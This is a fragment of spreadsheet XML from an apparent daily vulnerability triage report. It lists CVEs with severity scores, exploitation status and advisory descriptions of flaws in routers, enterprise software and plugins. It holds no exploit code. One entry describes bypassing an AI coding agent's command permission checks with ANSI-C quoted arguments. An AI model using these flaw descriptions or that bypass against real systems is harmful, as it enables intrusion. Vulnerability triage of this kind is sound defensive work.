Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16141" TargetMode="External" Id="rId57" /></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2026-09-11</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-11T00:00 to 2026-09-12T00:00</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-09-17 09:55:55 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>1100</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Newly published</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>725</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  Updated (recently published, now scored / KEV)</t>
        </is>
      </c>
      <c r="B8" s="3" t="n">
        <v>375</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="inlineStr">
        <is>
          <t>In CISA KEV (actively exploited)</t>
        </is>
      </c>
      <c r="B9" s="3" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="inlineStr">
        <is>
          <t>Critical</t>
        </is>
      </c>
      <c r="B10" s="3" t="n">
        <v>142</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="inlineStr">
        <is>
          <t>High</t>
        </is>
      </c>
      <c r="B11" s="3" t="n">
        <v>443</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="inlineStr">
        <is>
          <t>Medium</t>
        </is>
      </c>
      <c r="B12" s="3" t="n">
        <v>286</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="inlineStr">
        <is>
          <t>Low</t>
        </is>
      </c>
      <c r="B13" s="3" t="n">
        <v>30</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="inlineStr">
        <is>
          <t>Unscored (awaiting NVD analysis)</t>
        </is>
      </c>
      <c r="B14" s="3" t="n">
        <v>204</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="inlineStr">
        <is>
          <t>Watchlist matches</t>
        </is>
      </c>
      <c r="B15" s="3" t="n">
        <v>77</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="inlineStr">
        <is>
          <t>From GitHub Advisories</t>
        </is>
      </c>
      <c r="B16" s="3" t="n">
        <v>41</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="inlineStr">
        <is>
          <t>From OSV.dev</t>
        </is>
      </c>
      <c r="B17" s="3" t="n">
        <v>27</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="inlineStr"/>
      <c r="B18" s="3" t="inlineStr"/>
    </row>
    <row r="19">
      <c r="A19" s="2" t="inlineStr">
        <is>
          <t>Sources</t>
        </is>
      </c>
      <c r="B19" s="3" t="inlineStr">
        <is>
          <t>NVD 2.0, CISA KEV, FIRST EPSS, CISA Vulnrichment, GitHub Security Advisories, OSV.dev</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="2" t="inlineStr">
        <is>
          <t>Watchlist keywords</t>
        </is>
      </c>
      <c r="B20" s="3" t="inlineStr">
        <is>
          <t>microsoft:windows_server, microsoft:exchange, microsoft:sql_server, microsoft:sharepoint, oracle:database, oracle:weblogic, oracle:java, openssl, openssh, vmware, citrix, fortinet, paloaltonetworks, cisco, f5:big-ip, ibm:websphere, ibm:db2, ibm:mq, sap, apache:tomcat, apache:http_server, apache:struts, apache:kafka, apache:activemq, nginx, kubernetes, docker, jenkins, gitlab, atlassian, spring, log4j, postgresql, mysql, mongodb, redis, elastic, keycloak, okta, hashicorp, jackson-databind, fasterxml</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="2" t="inlineStr"/>
      <c r="B21" s="3" t="inlineStr"/>
    </row>
    <row r="22">
      <c r="A22" s="2" t="inlineStr">
        <is>
          <t>Priority rules</t>
        </is>
      </c>
      <c r="B22" s="3" t="inlineStr"/>
    </row>
    <row r="23">
      <c r="A23" s="2" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B23" s="3" t="inlineStr">
        <is>
          <t>In CISA KEV, or EPSS &gt;= 0.50, or SSVC exploitation = active</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="2" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 9.0, or CVSS &gt;= 7.0 with EPSS &gt;= 0.10, or SSVC exploitation = poc</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="2" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="3" t="inlineStr">
        <is>
          <t>CVSS &gt;= 7.0</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="2" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B26"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Newly scored</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D2" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E2" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F2" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I2" s="5" t="inlineStr"/>
      <c r="J2" s="5" t="inlineStr"/>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>RouterOS contains an argument-handling flaw in the SSH login
path involving usernames that begin with a prohibited character, allowing for the trusted RouterOS policy mask to be changed, leading to privilege escalation. Exploitation requires an unauthenticated SSH session to reach the RouterOS login helper.This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr"/>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>RouterOS accepts a "related" btest connection before the corresponding primary session has completed authentication. An unauthenticated client can use this state to start an IPv4 UDP test. With "random-data=false", the sender transmits an uninitialized tail from a kernel packet buffer. A separate unchecked, inverted packet-size interval causes unsigned integer underflow, anomalously large fragmented output, and can restart the RouterOS kernel.
This issue was fixed in versions: 6.49.21 (Long-term), 7.23.4 (Long-term) and 7.24.2 (Stable)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q8" s="5" t="inlineStr"/>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84869</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>connectwise:screenconnect</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q9" s="5" t="inlineStr"/>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>ConnectWise ScreenConnect contains both an improper privilege management and missing authorization vulnerability that may allow an attacker to transfer and execute files through an active remote session without authorization or host confirmation.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q10" s="5" t="inlineStr"/>
      <c r="R10"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S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q11" s="5" t="inlineStr"/>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14560</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>The teddy-bear-customize-addon WordPress plugin through 1.0.5 does not properly validate uploaded files, relying on a client-supplied content type and preserving the original filename, allowing unauthenticated attackers to upload arbitrary PHP files and execute code on the server.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14560</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80462</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security@progress.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the Chef Automate API gateway and identity validation path may allow an unauthenticated actor to gain elevated access to protected Chef Automate functionality under specific conditions.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80462</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82004</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.014</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>adobe:campaign</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>Adobe Campaign Classic (ACC) is affected by an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability that could result in arbitrary code execution in the context of the current user. An attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82004</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87985</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>An arbitrary code execution vulnerability in Mistral Vibe allows an attacker to bypass command permission checks using ANSI-C quoted arguments. These arguments are not properly inspected, enabling a crafted allowlisted command to execute arbitrary code on the user's system without approval.</t>
        </is>
      </c>
      <c r="S15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87985</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87986</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>6f8de1f0-f67e-45a6-b68f-98777fdb759c</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="n">
        <v>0.004</v>
      </c>
